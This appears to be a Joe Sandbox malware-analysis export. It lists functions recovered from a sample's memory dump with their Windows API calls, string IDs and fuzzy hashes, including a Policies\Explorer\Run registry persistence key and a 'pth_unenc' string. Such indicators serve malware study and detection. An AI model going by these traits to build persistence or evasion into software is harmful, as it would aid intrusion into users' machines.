                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteOpenValue
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  • API String ID: 2654517830-1051519024
                                                  • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                  • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                  • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                  • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                  APIs
                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ObjectProcessSingleTerminateWait
                                                  • String ID: pth_unenc
                                                  • API String ID: 1872346434-4028850238
                                                  • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                  • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                  • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                  • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CommandLine
                                                  • String ID: %k
                                                  • API String ID: 3253501508-3601005739
                                                  • Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                                  • Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
                                                  • Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                                  • Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                  • GetLastError.KERNEL32 ref: 00440D85
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1717984340-0
                                                  • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                  • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                  • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                  • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                  APIs
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                  • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastRead
                                                  • String ID:
                                                  • API String ID: 4100373531-0
                                                  • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                  • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                  • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                  • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99